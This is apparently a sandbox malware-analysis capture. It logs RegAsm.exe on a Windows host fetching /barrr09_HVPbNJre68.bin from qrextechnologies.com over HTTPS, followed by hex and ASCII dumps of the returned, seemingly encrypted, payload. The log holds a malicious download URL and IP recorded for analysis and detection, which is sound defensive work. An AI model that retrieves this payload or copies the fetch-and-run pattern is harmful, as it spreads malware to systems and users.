qrextechnologies.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49791	109.71.254.175	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-15 05:14:39 UTC	0	OUT	GET /barrr09_HVPbNJre68.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: qrextechnologies.com Cache-Control: no-cache
2021-09-15 05:14:39 UTC	0	IN	HTTP/1.1 200 OK Date: Wed, 15 Sep 2021 05:14:39 GMT Server: Apache Last-Modified: Tue, 14 Sep 2021 21:20:41 GMT Accept-Ranges: bytes Content-Length: 221760 Connection: close Content-Type: application/octet-stream
2021-09-15 05:14:39 UTC	0	IN	Data Raw: 68 68 d3 c4 11 32 cb 78 ab 72 c8 da f5 70 93 1a 83 68 38 89 77 20 41 71 14 c5 bb a0 ca 39 c6 47 64 ee ec 35 d6 cd 9b 3e 7a 18 40 ed 56 f3 cf cb 6a 73 24 02 3e 51 4c e4 0d 1f 99 23 05 0c ce fc 96 15 fc cc 1a 58 fd 3a 04 d8 46 68 cb 8f 21 a5 76 b5 c8 21 03 13 e0 64 a1 e0 d4 7c 5a 54 31 6e d3 60 cc f4 0b 72 a4 65 b5 e8 de 8f c4 73 36 69 0f 82 6e 49 53 36 8b 9d 05 6f d0 4b cf aa 06 d5 ca e1 50 bb ba f6 23 e5 e2 ec 48 92 7b ba 23 06 34 9a 7a 76 1d 36 ca 1d cd 6d c1 16 df 2a d4 fc 6b 67 9a 76 30 c9 c1 5e 16 6a 9b c9 53 4f 1d 4c 5e e7 69 30 e0 ad 46 64 6f a1 cf 08 d2 26 60 d7 75 f9 09 39 03 fd 04 aa a4 92 04 3f 64 b1 1e d0 22 86 b3 4f d7 48 ff d5 6f f7 c4 75 8c f9 b3 32 bd 41 14 fe c6 0a a3 72 86 7f 3d f6 e5 72 b1 44 8b bd da 05 10 01 c7 16 ed 29 97 18 a1 c4 a5 Data Ascii: hh2xrph8w Aq9Gd5>z@Vjs$>QL#X:Fh!v!d\|ZT1n`res6inIS6oKP#H{#4zv6m*kgv0^jSOL^i0Fdo&`u9?d"OHou2Ar=rD)
2021-09-15 05:14:39 UTC	8	IN	Data Raw: d7 0f 23 f9 72 99 e4 6e 38 24 68 de dc 8b e7 12 6b 81 96 19 0b 67 0d 05 50 70 ee cd d5 c6 05 1d 71 85 97 cc d2 95 b8 3e a1 f3 48 40 2e 05 dc 14 68 f8 e8 bb 31 50 9a 8d e5 6f c7 9d 9b 18 ec a4 84 82 18 d8 ff 00 7c fe 31 25 91 a1 58 05 f7 61 a2 c6 57 34 45 c5 19 e2 ab 98 3b e1 be 61 9b 3c e3 97 97 1d 33 e2 82 cd 1a ee f4 ce fe c2 6c fd be 69 cb 72 7c e9 18 43 a3 18 7a 9d af a3 64 84 87 44 bf a3 af e0 ce 02 05 b0 b9 ed e2 02 75 31 2d ce 43 14 85 2d 25 ab 79 71 fb 70 8b 66 39 c8 9c 7a f3 ec 2b 08 0a 11 05 f2 eb 0c 79 cf 82 1c 03 ca 91 b2 3c 88 56 1e ec 0c 27 88 8f 08 11 6e eb 7f 7f 5a f3 d4 a4 87 39 05 2f 48 ab a2 19 29 db aa e0 57 00 48 42 ba c9 48 99 90 49 bf 72 2e 79 80 18 17 a6 26 df 47 ba e1 99 44 4c 37 ff b4 59 75 0a d2 fe 8a 29 47 ff 65 00 96 89 a1 b0 Data Ascii: #rn8$hkgPpq>H@.h1Po\|1%XaW4E;a<3lir\|CzdDu1-C-%yqpf9z+y<V'nZ9/H)WHBHIr.y&GDL7Yu)Ge
2021-09-15 05:14:39 UTC	15	IN	Data Raw: 81 e7 60 1f fe a3 fc 30 52 6a 23 83 ff 0a d3 62 89 ab d5 b5 4a 89 53 7d 05 b9 a7 59 28 47 69 c0 75 29 aa 70 57 d4 06 f9 98 a4 29 5d 92 e7 c6 17 5d 53 ff bd ec fe d9 92 17 db f6 da 23 20 ff 21 7d 27 48 91 47 ef 3c 54 5f e2 bc 9e 96 ab a8 67 76 44 79 0a 0d 2b bd f6 d7 79 7b f8 60 48 b4 41 6a 36 13 c0 f1 2b 20 27 2f 74 14 35 a5 d9 da 5f a5 00 c3 86 04 d0 05 fa 32 f5 31 54 b7 20 5a 9a a1 9e 46 56 d8 ea ce 31 5a 22 cf be 6e d4 26 a4 1f 28 9e b2 7e f5 42 ef 96 d6 72 71 9e 41 d0 ed e9 cd c2 5d 10 da de 21 ce 5b 52 d9 4c 70 b2 c8 7f ab d1 e1 ee 31 e8 d4 66 30 67 2b 8c 01 ec 27 75 b2 7b b4 1d a1 04 1c e6 45 1b ba 5e 07 56 9a 30 1e d7 0f 23 f9 72 99 e4 79 10 35 68 de da 8a dd 12 6b ef b2 c7 07 43 3a 05 50 60 c6 f5 d4 c6 0f c3 71 a9 97 cd c2 e5 ba 3e a1 85 4a 4e 20 Data Ascii: `0Rj#bJS}Y(Giu)pW)]]S# !}'HG<T_gvDy+y{`HAj6+ '/t5_21T ZFV1Z"n&(~BrqA]![RLp1f0g+'u{E^V0#ry5hkC:P`q>JN
2021-09-15 05:14:39 UTC	23	IN	Data Raw: 1f 4d e9 1e 7f 95 b5 30 3c 12 f1 ff 06 04 c0 db 5c a7 0c 55 c4 b3 5f 7f 5f 2f 78 1b c0 37 72 c8 35 66 18 37 95 ef 14 bb e1 37 e1 49 b2 3c 35 d0 22 87 a0 5e 26 5c ec c6 75 e5 15 64 9d b7 a1 23 33 fe 3c e4 c7 0a a9 01 e0 08 3e fc f6 47 a0 51 9a ac b5 20 11 01 8d 05 fb 18 81 30 ba c7 a5 7e 1a 17 bf 96 c3 e0 0b e9 29 41 79 05 cd 68 17 ee 19 5c b1 33 87 ac 32 5d 9b 7d 60 a6 20 14 73 2d b3 60 68 30 d9 db c7 03 5c c8 43 a7 d1 e3 b8 eb 73 2d 0b 85 f4 49 f3 81 08 7e 35 2b a1 62 53 09 d8 a3 b7 59 86 ee 9e 96 2f 06 29 0f da 50 e0 5d fb f7 fd c7 88 5c f5 c4 1e 4a e7 6d fd 98 3e a2 1a dd 27 9a e8 cd f2 89 06 67 1b 7f ac 59 aa 9c dd 03 80 9b 29 00 be 24 0b 21 58 04 ca 9b ee 14 dd 78 f7 ce c3 a4 58 d9 e8 44 15 94 a0 42 33 30 16 db 74 23 7c 26 1a d6 06 fb 9c bf 3a 5a ef Data Ascii: M0<\U__/x7r5f77I<5"^&\ud#3<>GQ 0~)Ayh\32]}` s-`h0\Cs-I~5+bSY/)P]\Jm>'gY)$!XxXDB30t#\|&:Z
2021-09-15 05:14:39 UTC	31	IN	Data Raw: 0a ff c4 7f 50 d1 13 c7 87 3f 16 6a 6b a9 8a 00 31 90 a8 57 51 6f d6 13 ba c3 87 83 b4 46 16 72 24 51 b8 10 0a 52 f9 f3 28 cb 82 99 40 60 26 d0 b4 53 a1 3f 62 c9 8a 29 53 db 5d 08 8d 7d 7e 9c cf 0f 76 45 d6 09 ca 1f 2e 7b 8f f5 08 d1 90 c2 0d 65 3c 25 12 ac 69 c2 c1 e1 aa d4 91 ef b3 e1 96 dc b8 fd c6 c7 00 43 7b fa e9 87 1a a7 d7 87 7a 5d d7 4f 64 d2 e7 59 d1 34 7e bb 46 68 30 67 09 da cf b5 c2 3e 0a 1f e0 6c fd 1e d5 50 52 7c 9e 6e d3 66 c7 e9 07 72 ac 7f 4b e9 f2 88 ec dd 36 69 09 99 62 49 5b 2e 75 9c 29 63 f8 cb 4e aa 0c 55 a6 fe ea b1 a3 4e 2a 20 d5 aa 48 f2 b4 8c 7b 6e 55 f6 53 f8 6e 75 af 44 a9 38 b3 8a 41 bb bd b9 1f 5c c8 17 10 31 b7 30 36 51 f5 e9 06 28 7d 6f 33 8e 06 26 f7 a1 4b 64 41 a7 e7 3c d1 26 66 a9 44 bc 09 3d 67 7a 05 aa e9 08 85 5e 64 Data Ascii: P?jk1WQoFr$QR(@`&S?b)S]}~vE.{e<%iC{z]OdY4~Fh0g>lPR\|nfrK6ibI[.u)cNUN* H{nUSnuD8A\106Q(}o3&KdA<&fD=gz^d
2021-09-15 05:14:39 UTC	39	IN	Data Raw: 01 75 b2 71 3a 33 a1 04 90 ca 59 1c 89 40 2f ed 96 30 14 ff 9f 20 f9 74 b1 c0 79 10 00 42 70 db a3 d7 7d c4 86 b0 cd 18 55 12 be 50 7a cc dd 45 c5 0f c5 59 8b 97 cd c8 bd 97 3e a1 f9 64 52 27 1a ca 26 d3 f8 e9 aa 29 c2 99 90 e3 47 e3 82 9b 12 d5 1c ad ac 10 b7 56 29 46 f4 36 4c 07 7e 56 2a cc 5a 9a c7 5c 3e 6d ef 15 ca 10 47 3b c1 b3 68 b3 65 f3 97 91 0e 37 fd 98 eb af ee fa de d6 53 6e e6 88 42 ef d9 7c e3 30 ee a2 18 61 96 82 9c 63 f0 ea 6c 85 a2 c0 27 c4 04 27 d9 b6 d5 46 6d e8 31 3c c9 15 56 85 2d 2f fd d9 71 fb 70 b0 1a 2a cf b2 73 9f d1 2d 19 04 2d 51 62 e8 0a 10 47 0f 1b 09 14 9c 8e 1f 9c 7e b7 c4 34 2d e7 90 d6 11 1a ff 58 7f 50 d1 80 a0 96 39 3a 71 75 ab a8 3f 63 bb 86 e2 51 69 c7 44 92 4d 97 95 b2 11 30 73 24 5b 90 4c 17 ac fe cc 30 a4 e7 b1 03 Data Ascii: uq:3Y@/0 tyBp}UPzEY>dR'&)GV)F6L~VZ\>mG;he7SnB\|0acl''Fm1<V-/qps--QbG~4-XP9:qu?cQiDM0s$[L0
2021-09-15 05:14:39 UTC	47	IN	Data Raw: a2 10 cc 81 e9 cc cc 07 83 15 7d 1c 65 bd 44 c5 b9 dc 03 8a 88 37 1f f8 a9 20 21 40 04 d9 83 e1 01 c2 68 f3 d6 d5 b5 5a 57 5f 6d 14 a5 a3 48 62 29 3e c0 04 23 76 1f 3e 6e 06 fd be 9b 46 66 e9 cf cd 3f 81 3f 03 bb fb 9b c8 8b 06 d6 a0 f5 24 2b 26 26 13 da 48 4f 59 db 13 18 77 e3 b6 89 fd 53 a3 4f 44 9a 75 28 e7 22 bc fc ff 3f 47 f8 6a 9c 9c 47 66 13 3d e0 9e 16 2a 34 2b 50 24 5a 11 d2 04 55 af 23 d0 c9 86 c3 08 c0 f0 f5 31 99 a7 2e 4b 85 3b 8d 43 f7 e5 ea ce 37 72 fb cc be 68 c5 23 8e 3b 28 9e 7c 68 9a 7f d8 96 dc 61 8c b7 55 d1 e1 e3 dc c4 75 ca d9 de 25 a1 ee 53 62 47 04 a0 9d 7f b0 be e8 ed 31 e2 cb 6d 21 61 03 57 02 ec 23 1a 07 7a 12 16 d5 16 9a e6 5e 08 91 4d 01 7e 4a 33 1e d1 60 96 f8 72 93 90 6b 10 0a 71 cd d2 b1 d5 03 63 09 07 d0 dd 67 3c 05 50 51 Data Ascii: }eD7 !@hZW_mHb)>#v>nFf??$+&&HOYwSODu("?GjGf=*4+P$ZU#1.K;C7rh#;(\|haUu%SbG1m!aW#z^M~J3`rkqcg<PQ
2021-09-15 05:14:39 UTC	55	IN	Data Raw: 8d 59 2e 2e cb 58 06 69 4a a5 7e a4 28 b6 77 be 42 d5 bb 1d 47 fe 02 18 aa b2 5f 12 01 f5 ef 06 08 5f 68 1b 8a 0c 55 c8 cf 6d 6c 4b a7 de 00 fa 65 64 d7 23 d3 23 3b 4f fa 00 bb e7 4f 23 5f 64 bb c0 85 51 a4 b1 4f 31 5b f4 c5 6d de 98 77 8c a7 df 1a bf 49 12 ef cf 1b a4 1d ec 0b 3e f0 f4 5b a0 41 a3 bf db 05 16 6e a1 14 ed 0f 86 11 89 85 a1 74 34 2f 97 94 c5 ce 22 fa 20 28 0e 7c cd 62 c3 e8 2b 7d a6 3d 07 a6 21 17 28 c7 60 a6 35 08 d6 3e b3 60 63 fd c0 cd f9 1a 6d d7 53 8f b3 fe b8 e1 70 5e 2f 84 e6 43 e0 98 0f 66 24 30 e6 46 52 09 c7 b0 ab 48 8f f9 44 80 ea bb 06 0f ee 50 f3 40 6b e3 ec c4 8f 5c 24 ed 91 5c f6 7e d5 93 34 bb ee cd 17 e0 e4 e2 f0 83 13 57 10 76 b6 44 d4 b2 cb fd 8b a4 34 07 ed a2 20 30 53 1f 27 82 d3 43 e2 68 e2 d6 d5 38 6b 57 5f 6d 05 83 Data Ascii: Y..XiJ~(wBG__hUmlKed##;OO#_dQO1[mwI>[Ant4/" (\|b+}=!(`5>`cmSp^/Cf$0FRHDP@k\$\~4WvD4 0S'Ch8kW_m
2021-09-15 05:14:39 UTC	62	IN	Data Raw: 3a 54 a9 f0 17 07 9a 9a 1a 8f 48 ea c5 18 34 99 80 c7 15 7f 33 7e 7f 5a f3 44 a7 87 35 1f 5f 7c b8 a5 13 10 94 b7 eb af 6e fa 48 ab c7 81 43 ab 7a a0 7e 37 56 b8 09 10 b3 f1 21 38 99 f3 9f 49 0b 04 fe b4 59 c4 9b fa c9 80 05 92 c8 57 13 91 83 6e b7 d3 d9 c7 69 d0 19 c5 17 32 60 91 0b 18 fa 93 42 6d 49 35 09 4d b6 6a c4 cd 86 db d3 91 fa 9c d9 9c 22 b3 51 a9 cf 09 6f 45 f6 e9 85 01 46 dd b8 7f 45 ca 48 75 32 18 74 f4 12 2e da 46 6e 38 6a 32 a2 ce a4 cf 36 fd 12 cc 67 f9 f3 d3 7c 4b 53 2d 90 d2 4c c0 e5 0e 1d 6d 65 b5 e2 cd 89 d9 60 31 69 1e 85 74 b7 52 1a 8d 9f 16 6a cb 58 48 aa 17 d2 d2 00 eb 99 b9 55 39 2f c3 45 4e c1 bb 65 76 42 5f c2 5f 3e 65 a6 52 90 a4 2a fa 45 bb 44 f4 92 1f 47 77 13 10 aa c7 55 37 03 ff fa 11 11 48 03 c4 89 0d 5f b0 c7 4b 6e 4f 2f Data Ascii: :TH43~ZD5_\|nHCz~7V!8IYWni2`BmI5Mj"QoEFEHu2t.Fn8j26g\|KS-Lme`1itRjXHU9/ENevB__>eR*EDGwU7H_KnO/
2021-09-15 05:14:39 UTC	70	IN	Data Raw: c1 71 b2 97 6c a1 f9 43 e8 31 ee ab e1 31 67 21 9f 09 fd 2d 64 b4 14 aa 1d a1 0e f5 6c 44 1b 9c 4b 68 dd 97 30 14 b8 83 22 f9 78 8a e3 0a 32 08 6a d8 c9 aa cc 1b 7a 8d df e3 05 4f 3c 14 59 6b c1 9a f3 c4 0f c5 60 a6 bf 7e c6 95 be 51 8b f1 48 48 31 0c f8 59 6a f8 ef cf 29 50 9a 96 e3 7e ce ed 83 19 fd b8 72 b9 3f f0 ce 28 46 f4 22 2f c4 c5 56 20 d5 5d 8a fe 5d 3e 67 23 1b e4 8b 41 11 cb be 60 8b 3d f3 97 97 2d 33 03 93 c2 01 f4 fa d4 ff d9 5d e2 8e 44 cb d9 7c c9 18 63 b2 30 fc 85 87 87 64 ac e8 6d 85 a9 bb f1 ec 91 2c ca b1 82 fd 6c e8 3b 27 1a 68 bc b2 2d 25 df 6d 5f f9 7a a5 17 13 f0 9a 6d 96 0f 2b 0e 2a 39 79 f1 fb 0a 16 51 82 1c 09 0e 87 9a 19 92 56 14 c5 2f 17 8c 85 f5 11 10 d7 5f 7f 50 ca bb 31 87 3f 18 42 61 bd 8a 86 00 93 a2 8f 48 6e d6 48 b0 1d Data Ascii: qlC11g!-dlDKh0"x2jzO<Yk`~QHH1Yj)P~r?(F"/V ...g#A`=-3]D\|c0dm,l;'h-%m_zm+*9yQV/_P1?BaHnH
2021-09-15 05:14:39 UTC	78	IN	Data Raw: cd 8b ee 1f 8e 31 cc 2a 99 4f 2f dd 1c 43 a9 1d 8a 36 a3 b3 17 d9 ed fa cb dd f5 92 1d 52 8d 74 b8 52 ed 86 dd 03 80 a2 37 1f fe ba 10 23 58 2f d9 83 ff 05 c2 68 f7 c0 de 9e 5b 57 58 7b f1 94 8c 4a 3a 23 3e c7 63 dd 77 22 4f c3 0d fd b3 89 c6 5b c5 cd ec 15 72 df 00 aa 86 ab e2 e1 f8 dd a7 f2 22 33 cb 3d 12 aa 48 91 4d 4a 3b 2f 66 f5 af 9e d2 11 a8 76 78 82 8b 23 16 25 b9 e2 01 43 7f ee 94 97 d4 b3 56 0a 28 f3 f1 3a 2e 2d df 5d 00 33 b3 b9 2e 45 b1 2e c3 d6 94 c7 fb f9 1e f6 29 8a b2 20 4b 8c b7 60 47 a5 da fd dd 39 5a 33 cb a4 90 d5 0a a4 34 2a b5 cc 69 9f 49 ce 92 c1 a8 87 93 6a c4 e6 f7 af c0 26 d6 da de 27 cd 53 84 f3 23 10 b9 95 68 7d dd f9 e5 00 00 df 4c 23 57 2d 8c 70 e0 25 75 07 7b 12 0d b7 17 95 de 26 17 96 5c 07 47 99 2f 2d 29 0e 0f d8 70 e2 2c Data Ascii: 1O/C6RtR7#X/h[WX{J:#>cw"O[r"3=HMJ;/fvx#%CV(:.-]3.E.) K`G9Z34iIj&'S#h}L#W-p%u{&\G/-)p,
2021-09-15 05:14:39 UTC	86	IN	Data Raw: c1 4c 63 a1 2e fb c6 fe ec c6 e3 40 2a 22 b9 45 42 c8 48 98 64 66 4c e1 76 11 47 77 af 6f aa 11 ea f9 c2 44 ba 92 37 59 f9 13 1a c8 ed 32 36 09 8f 37 19 12 42 92 25 c5 0d 55 cc cf 1c 6e 4b ab 13 01 fa 4a 60 d7 23 9a 18 3d 67 a6 05 aa e5 28 2d 76 0c b1 1e d6 04 97 b6 65 37 49 ed d4 64 f4 cf 45 8c 1d 5c 32 b3 49 14 fe c6 19 93 76 c8 98 3e f6 e5 14 b1 44 9a ab d7 3d 6d 01 87 16 ed 00 8b e6 a0 ea ad 7c 2a 47 a1 07 59 d5 28 eb 20 5a e8 7c e1 60 15 e4 09 48 00 a1 19 a1 32 14 40 83 61 8a 37 0c e9 01 a8 f1 f5 3f cf ca da 08 b9 d6 7f 87 fa f4 bf fb e1 c2 34 89 f4 4a f7 66 18 4b 26 28 c3 47 5b 11 2c b1 87 47 97 fa 3a ae f9 8b 06 60 46 50 f3 46 e1 fa e1 d5 90 56 d1 d4 2f 55 ec f3 fe 82 3f a3 1c d6 36 e9 c5 da 0c 82 39 7f 1d 68 bd 4d db 47 dd 2f 88 a3 32 27 80 56 df Data Ascii: Lc.@"EBHdfLvGwoD7Y267B%UnKJ`#=g(-ve7IdE\2Iv>D=m\|GY( Z\|`H2@a7?4JfK&(G[,G:`FPFV/U?69hMG/2'V
2021-09-15 05:14:39 UTC	94	IN	Data Raw: 7a 05 7b 8f 08 3c ca e1 63 9d d1 2f 67 86 3b 79 fa e2 d0 ae 86 89 03 05 07 98 9a 1a 8d 4a ea c5 18 3a 8a fe d8 10 10 d3 7d 04 40 da 93 a2 91 3d 69 50 74 ab a6 9d b6 fc 01 e0 51 65 cb 51 bf c3 87 90 ae 80 be 5e 27 46 ab 1d 17 bd fd c0 2e 4b e0 b5 42 4f 0b c7 5d ae 54 f9 d0 da ba 2c 4d d2 5f 00 96 5b 7f b0 d9 25 bd 55 d7 0f d2 3e 25 5b 57 0f 09 fb f8 3f 6e 65 36 5b 49 cd 68 c2 cd 93 de de a9 3e 9a c6 96 de c9 6d a4 c7 04 41 49 e1 e8 8f 07 4a c6 ba 68 2b fb 1f 27 cd 1b 32 bd fd 01 d8 46 6a 4f 60 20 a5 ca b3 d6 f7 2b 98 e2 64 eb c0 d4 74 5a 54 6e 78 2d 61 da 0a 0a 61 a3 67 ce f8 df 8f c0 75 29 63 d9 aa e5 4b 53 3c 98 90 07 14 c0 4a 4f ae 00 ca c8 28 c2 a2 bb 42 20 3b cd 56 32 ce b7 9b 73 68 42 f9 8c 2e 78 58 ad 65 bf 05 e3 0e ae 45 ba 97 19 58 ec c5 38 ac b5 Data Ascii: z{<c/g;yJ:}@=iPtQeQ^'F.KBO]T,M_[%U>%[W?ne6[Ih>mAIJh+'2FjO` +dtZTnx-aagu)cKS<JO(B ;V2shB.xXeEX8
2021-09-15 05:14:39 UTC	101	IN	Data Raw: d4 09 a2 9e 41 d4 e7 86 9b c3 5d 1a d6 c1 2f dd 5f 52 73 49 6b 4c 9c 53 83 d3 8a c4 30 e8 dc 4e 6e 66 2b 86 29 0d 21 75 b4 53 a2 1e a1 0e b2 c2 45 1b 9c 33 9f 56 96 3a 71 82 0e 23 f3 54 85 f7 7d 10 1b 6e c1 d5 5d dc 3e 64 85 cb ef 06 4f 3e 6a ae 7a c6 ff ca d6 1c c7 71 be 93 d5 3c 94 94 26 89 2d 4a 4e 26 2d 87 0f 68 f2 c9 fb 22 52 9a e3 87 6d c7 88 90 01 ee b6 ac bd 1e c2 07 29 6a ea 33 58 9f 7e 56 24 d8 22 49 c6 5d 3f 02 4c 1b e2 ab 5d 28 cf be 70 9f 22 fe 69 96 31 27 eb aa 20 10 ee fc bb 63 c2 6d ec b4 9b cb d9 7c f6 16 70 a7 18 7a 81 9e 73 67 a8 90 6e 9d b4 b3 95 b1 06 2d c0 c6 c5 e5 6d ec 2b 3e c0 7a 85 81 32 29 2b 44 5d e9 52 fd 1c 3b c2 9c 7b 94 be 3e 09 00 33 74 ef e6 19 12 51 93 18 15 ea 9c b6 05 a8 56 10 c4 34 aa a3 85 d6 10 1a ca 6c 7b 50 ca 97 Data Ascii: A]/_RsIkLS0Nnf+)!uSE3V:q#T}n]>dO>jzq<&-JN&-h"Rm)j3X~V$"I]?L](p"i1' cm\|pzsgn-m+>z2)+D]R;{>3tQV4l{P
2021-09-15 05:14:39 UTC	109	IN	Data Raw: 61 4b e5 cc 47 58 66 04 b2 ab 42 b3 fb 3f c0 f8 8b 06 60 0d 53 f3 4a f9 ed c7 c2 8b 41 07 0d 01 5c fc 6d d3 8a 2e a4 7f d9 3b e9 c6 a3 9d 81 15 77 2c 77 b3 6c 1c bb dc 09 a7 68 e9 11 ec a7 de 37 74 05 d9 98 90 57 c2 68 ec 0a d7 ce 7f 56 5f 68 83 d4 a0 48 20 37 0e 4c 34 23 76 0c 22 0e 04 fd be bd 34 52 c1 d4 c2 17 5f 53 ce bd ec fe d3 83 69 0e 8d f2 28 0a fa 29 12 da 4a 91 00 ff 0a 51 76 ed bc 9a f9 55 bb 57 7f 9a 00 22 3a 2b bd fc ff 41 79 d0 7d 96 b4 95 67 04 46 b3 f0 2b 2e 36 37 21 6a 34 a5 d7 06 49 df 6d c2 c7 94 d2 06 85 7a f4 31 9d b4 5b 12 89 a1 9a 42 e6 02 e8 ce 37 58 27 b2 f7 6f d4 22 a4 11 2c e3 3c 7e f5 46 da 94 ad 3a 8b 9f 45 bf dd e8 cd c8 31 33 da de 23 ce 5b 52 42 0d 2b 9a 0c 7f ab db 46 91 72 e9 d8 62 32 65 50 cf 00 ec 21 62 68 6c c4 91 8a Data Ascii: aKGXfB?`SJA\m.;w,wlh7tWhV_hH 7L4#v"4R_Si()JQvUW":+Ay}gF+.67!j4Imz1[B7X'o",<~F:E13#[RB+Frb2eP!bhl
2021-09-15 05:14:39 UTC	117	IN	Data Raw: 67 b5 e2 b1 73 c5 73 30 7e 60 50 6c 49 59 59 75 9c 05 69 c3 44 5e a7 69 29 c5 fe ec a3 d5 90 28 28 c9 3b b5 df b6 9d 6f 01 8f eb 5a 0c 00 a7 ac 6f aa 13 ef 64 b0 3a f6 92 1f 43 e9 1c 38 a7 b6 30 30 10 fe 9a 35 02 4e 6a 20 98 1c 45 c6 cf 63 6c 4b a7 de 18 c3 2a 48 fa 20 bc 0f 11 61 fe 07 ac c7 cc 39 5e 6e de 3a d2 22 80 a2 5f 26 43 d5 f9 61 f6 c9 5d a2 a3 b0 34 95 a5 16 fe cc 65 85 70 c8 0f 2f e6 e6 3d 9b 46 8b bb dc 14 00 6e 9f 17 ed 03 49 17 84 ee 92 74 32 4a ae 82 ed f0 25 eb 23 99 16 6c c7 7f cb ee 04 44 9b 2c 10 92 47 e3 a4 82 71 b3 28 d2 ed 13 a2 75 78 35 4c 7d ec f9 ba 28 ac 89 d8 e2 f9 d5 70 5e 2f 84 f4 43 b3 98 19 67 2f 30 ce 47 0c 09 d2 b0 b9 48 95 f9 5e 81 f9 8a 02 0f da 51 6e 40 ea e3 81 d4 99 4f 25 d7 03 5c f9 7e d5 82 25 a2 10 cd 20 d9 c5 cc Data Ascii: gss0~`PlIYYuiD^i)((;oZod:C8005Nj EclK*H a9^n:"_&Ca]4ep/=FnIt2J%#lD,Gq(ux5L}(p^/Cg/0GH^Qn@O%\~%
2021-09-15 05:14:39 UTC	125	IN	Data Raw: ee 82 53 53 ba ed e0 4d 54 31 2d c4 e0 b1 a8 3f 03 f5 f9 71 fb 7a 83 ff 33 c8 9a 72 91 f9 06 0a 00 3f 53 76 95 93 17 51 86 3c b4 14 9d 9a 91 ad 7b 06 e2 14 9a 88 85 d6 31 ff df 7f 7f 4f c0 bb 8b 85 3f 14 6a f7 d5 3b 12 01 97 88 5e 51 6f d6 d8 9f ee 87 b3 98 c0 bf 72 24 71 b2 11 17 ac e2 f7 14 b7 e1 9f 6a e2 70 66 b5 53 af 26 45 c9 8a 29 d7 f2 70 12 b0 a3 c0 b0 c8 27 e6 4b df 0f d6 0c 0f 5b bb 09 09 fb a1 3a 12 fc 3d 21 3e 92 aa c2 c7 9f 52 f1 bc f9 bd e6 56 dc b2 7d 85 e8 09 47 61 e9 e6 a7 20 5b d6 ad 52 c7 a5 d6 6d cc 1d 78 3c 3a 00 d8 dc 4d 19 61 07 85 0f b5 c8 21 23 2d e9 64 e1 fb fc 51 58 54 37 44 55 1e 55 f5 0b 76 84 a7 b5 e8 de 15 e1 5e 24 4f 2f 40 6e 49 53 16 c8 94 05 6f cf 68 67 87 04 d5 c2 d4 68 cb 23 43 2a 2c e3 97 49 de b6 01 52 43 4c cf 7a c5 Data Ascii: SSMT1-?qz3r?SvQ<{1O?j;^Qor$qjpfS&E)p'K[:=!>RV}Ga [Rmx<:Ma!#-dQXT7DUUv^$O/@nISohgh#C*,IRCLz
2021-09-15 05:14:39 UTC	133	IN	Data Raw: ce 1d 99 3a cf be 70 fc 0b a4 1f 2e b4 f0 01 6c 43 d8 92 f6 d8 8b 9f 41 4a c4 c4 df e4 7d ba db de 23 ee 90 4a 62 4d 6f ae b5 52 a9 d1 f7 c6 b7 96 41 67 30 63 0b 27 00 ec 25 ef 97 56 00 3a 81 af 9b e6 45 3b 71 44 07 56 89 2d 36 fa 0d 23 ff 58 1b 9a e0 11 0a 6e fe 76 a2 dd 12 f1 a2 9d d6 21 6f 96 04 50 7a e6 f1 cc c6 0f dd 59 82 95 cd c4 bf 3e 40 38 f2 48 4a 00 a8 d1 0e 68 62 cc 8d 13 74 ba 3d e4 6f c7 a2 97 01 fd b2 b3 a5 32 f5 fb 28 40 d4 b3 5d 2e 7e 56 24 ff f8 a3 c6 5d a4 48 d0 08 c4 81 e8 3a cb be 41 8e 24 f3 97 8a 35 1e e0 82 c5 3e 6c 84 4d ff c2 69 c6 21 6b cb d9 e6 cc 35 72 85 38 c4 84 87 8d 46 98 98 6c 85 bd 87 cb c6 04 2b e0 3d 93 7d 6c e8 35 0d 74 7b 94 85 b7 00 f8 57 57 db ca a2 1d 3b e8 be 74 9c d1 34 03 28 14 7b f0 ed 20 90 2f 1b 1d 09 10 bd Data Ascii: :p.lCAJ}#JbMoRAg0c'%V:E;qDV-6#Xnv!oPzY>@8HJhbt=o2(@].~V$]H:A$5>lMi!k5r8Fl+=}l5t{WW;t4({ /
2021-09-15 05:14:39 UTC	140	IN	Data Raw: 4a 13 47 d3 73 17 f0 e2 b8 7b 55 73 3e a2 d4 db e2 98 19 47 f3 16 ce 47 4a 21 ff b2 ab 4e bf 7b 3a 18 f8 8b 06 2f 43 53 f3 40 70 c6 c1 c4 bf 6f b6 d7 03 5c d6 a7 f3 82 3f b5 38 e1 39 e9 ca e6 70 fd 8c 7c 0a 61 9d de c7 b9 dc 99 af a5 26 39 de 33 22 21 58 25 03 a5 ff 00 da 40 cb d4 d5 b3 6a d5 21 f5 0e 95 a4 68 b9 2a 3e c0 ef 06 5b 1f 6b f4 9d ff b4 91 18 86 cf cf c7 0b 71 11 01 bd ea de 77 f5 9f dd 8d f6 02 bc f9 39 12 40 6d bc 5c d8 1b b3 75 e3 bc ba 1b 73 a8 67 6b b2 58 20 3a 2d 97 7e 81 d8 7a f8 6e b6 29 9d 65 13 a1 d2 dc 3a 0c 14 bc 5e 2c 35 85 30 22 5f a2 34 eb ea 92 d0 03 d2 b0 8b a8 98 b6 24 7a 16 a3 9e 46 13 fc c7 df 1b 7a bc cd be 6e f4 cd 80 1f 28 89 5e 52 f7 42 de bc 54 0c 13 9e 41 d4 c1 76 cf c2 5d 8a ff f3 32 e8 7b cd 60 4d 70 92 71 59 ab d1 Data Ascii: JGs{Us>GGJ!N{:/CS@po\?89p\|a&93"!X%@j!h*>[kqw9@m\usgkX :-~zn)e:^,50"_4$zFzn(^RBTAv]2{`MpqY
